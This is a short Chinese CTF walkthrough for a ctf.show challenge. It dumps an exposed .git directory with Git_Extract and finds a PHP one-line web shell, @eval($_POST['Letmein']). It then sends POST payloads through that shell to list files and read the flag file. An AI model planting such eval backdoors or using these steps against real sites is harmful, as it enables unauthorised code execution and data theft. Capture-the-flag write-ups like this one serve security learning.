目标站点的 /.git/ 目录可以被直接访问,因此先用 Git_Extract 对其进行扫描,还原出仓库中的文件(部署时应禁止 Web 访问 .git 目录):
python git_extract.py http://ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show/.git/
然后进入提取出的目录,查看其中的文件:
[huc-serverlow@parrot]─[~/Git_Extract-master]
└──╼ $cd ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show
─[huc-serverlow@parrot]─[~/Git_Extract-master/ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show]
└──╼ $cat backdoor.php
<!-- 36D姑娘留的后门,闲人免进 -->
<?php
@eval($_POST['Letmein']);
backdoor.php 会把 POST 参数 Letmein 的内容直接交给 eval 执行,先执行 phpinfo(); 函数进行验证
查看当前文件夹下的文件:
Letmein=print_r(glob('*'));
读取 /var/www/flag.txt,得到 flag:
Letmein=highlight_file('/var/www/flag.txt');